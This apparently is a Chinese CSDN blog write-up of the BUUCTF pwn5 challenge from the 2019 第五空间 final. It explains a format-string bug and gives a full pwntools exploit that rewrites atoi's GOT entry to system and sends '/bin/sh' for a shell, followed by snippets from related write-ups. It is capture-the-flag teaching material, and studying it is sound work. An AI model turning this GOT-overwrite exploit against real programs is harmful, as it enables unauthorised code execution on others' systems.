pwn BUUCTF第五空间决赛pwn5

最新推荐文章于 2024-09-01 23:26:39 发布
最新推荐文章于 2024-09-01 23:26:39 发布
阅读量971 收藏
点赞数 1
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/101685716
版权

emem今天也是水题的一天阿哈哈看了一个第五空间决赛的pwn5发现很简单诶
这题估计有很多的思路因为
在这里插入图片描述
明显的格式化字符串漏洞可以改写got表的地址,可以打印地址的内容所以
我就讲2个
它是随机数和你输入的数相同就会给你一个后门所以就可以泄露出给你的随机数然后输入进去就行了
我这里写一个
在这里插入图片描述
这个函数我们把其改为system函数地址然后输入’/bin/sh\x00’
就行了很简单啊啊

from pwn import *

p=process('./pwn1')
p=remote('node2.buuoj.cn.wetolink.com',28910)
elf=ELF('./pwn1')
def debug():
	pwnlib.gdb.attach(p)
	pause();
offset=10
system_addr=0x08049080
read_addr=elf.got['read']
atio=elf.got['atoi']
p.recvuntil(':')
payload1=fmtstr_payload(offset,{atio:system_addr})
p.sendline(payload1)
p.recvuntil('your passwd:')
p.sendline('/bin/sh\x00')
'''
p.sendline(payload1)
p.recvuntil('Hello,')
p.recvuntil('\x08')
rec=u32(p.recv(4).ljust(4,'\x00'))
log.success('rec: '+hex(rec))
p.recvuntil('your passwd:')
p.sendline(p32(rec))
'''
p.interactive()
doudoudedi
关注
专栏目录
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 378
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4531
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
buuctf [第五空间2019 决赛]PWN5
carol2358的博客
04-11 711
一道格式化字符串的题 先输入AAAA %08x %08x %08x %08x %08x %08x %08x········来确定输入首地址的偏移(找到41414141就是AAAA) 之后只要修改随机数的值,让输入和随机数的值一样就可以了 exp如下: from pwn import * context(log_level = 'debug',arch ='i386',os = 'linux' )...
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
最新发布
2302_81740139的博客
09-01 779
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
[第五空间2019 决赛]PWN5
weixin_56301399的博客
07-21 1671
格式化字符串漏洞
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4705
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 845
BUUCTF--pwn--[第五空间2019 决赛]PWN5
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 410
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 452
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5
Y_peak的博客
02-21 361
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5 题目地址:https://buuoj.cn/challenges#[第五空间2019%20决赛]PWN5 题目: 这是一道格式化字符串的题,给大家讲解下 checksec一下看看, 开启了canary保护, 基本开启这个保护都会用到格式化字符串的漏洞。 在IDA中 利用pwndbg看看, 偏移是多少。 0xa也就是 10 思路 利用格式化字符串漏洞, 修改unk_804C044的值, 并且输入相等的值 exploit from p
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1515
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 692
简单易懂~
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 1003
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
BUUCTF-PWN-[第五空间2019 决赛]PWN5
m0_64180167的博客
04-17 483
这题考到 格式化字符串的方法 我之前没有学过 根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开 所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计 发现输入名字 他会返回名字 然后再输入密码 如果密码和unk_804c044一样 输出shellcode我们看看这个函数是什么搜索一下发现是随机数 这样我们就无法通过判断得到shellcode我们现在又两个方法。
第五空间-PWN5
shidaofu的博客
09-15 184
国际惯例 无脑 IDA 思路 WP 总结
第五空间pwn5
qq_46441427的博客
07-03 286
文章目录前言一、题目特征二、分析方法1三.参考文章 前言 一、题目特征 二、分析 方法1 格式化字符串漏洞,那直接改那个函数的值 直接修改atoi函数的.got.plt表地址 这样在调用atoi函数的时候,可以直接在公共plt表跳转到system函数 确定偏移为10 from pwn import* p = process('./pwn') elf = ELF('./pwn') atoi_got = elf.got['atoi'] system_plt = elf.plt['system'] p
BUUCTF PWN
Charles_Andrew的博客
11-21 168
连上,cat flag flag{5885351f-3a2e-4ca2-819f-4b0a42c8f029}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值